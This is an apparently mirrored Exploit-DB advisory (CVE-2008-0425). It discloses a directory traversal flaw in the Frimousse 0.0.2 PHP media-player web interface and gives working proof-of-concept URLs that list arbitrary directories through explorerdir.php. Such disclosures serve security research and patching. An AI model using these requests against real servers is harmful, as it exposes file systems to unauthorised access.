- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4943
- Проверка EDB
-
- Пройдено
- Автор
- HOUSSAMIX
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-0425
- Дата публикации
- 2008-01-20
Код:
software : Frimousse v.0.0.2
vendor : http://frimousseweb.free.fr/
[+] Introduction
Frimousse is a freeplayer interface web written in php language , works with apache & php & VLC ( media player ) .
it is used for manage the playlist and view it in interface web with VLC media player .
Frimousse runs on Linux and Microsoft Windows.
apache & php & VLC are integred in setup of version for windows and attched with php archive for linux :
Frimousse 0.0.2 setup.exe > http://frimousseweb.free.fr/files/Frimousse_0.0.2_setup.exe
Frimousse 0.0.2 minimal.rar > http://frimousseweb.free.fr/files/Frimousse_0.0.2_minimal_install.rar
[+] vulnerability discovered by : Houssamix from H-T Team
H-T Team = HouSSaMix + ToXiC350 + RxH
[+] vulnerable version : Frimousse v.0.0.2
{ BUG } : directory traversals :
=> xpl > http://127.0.0.1:8080/explorerdir.php?name=[directory]
=> ex > http://127.0.0.1:8080/explorerdir.php?name=C:
http://127.0.0.1:8080/explorerdir.php?name=C:\Program Files
------------------------------------------------------------------------------------------
- H-T Team -- greetz : Cold-zero (hackteach.org) -Mahmood_ali (tryag.cc) - DDos & all hackers muslims --
------------------------------------------------------------------------------------------
# milw0rm.com [2008-01-20]- Источник
- www.exploit-db.com
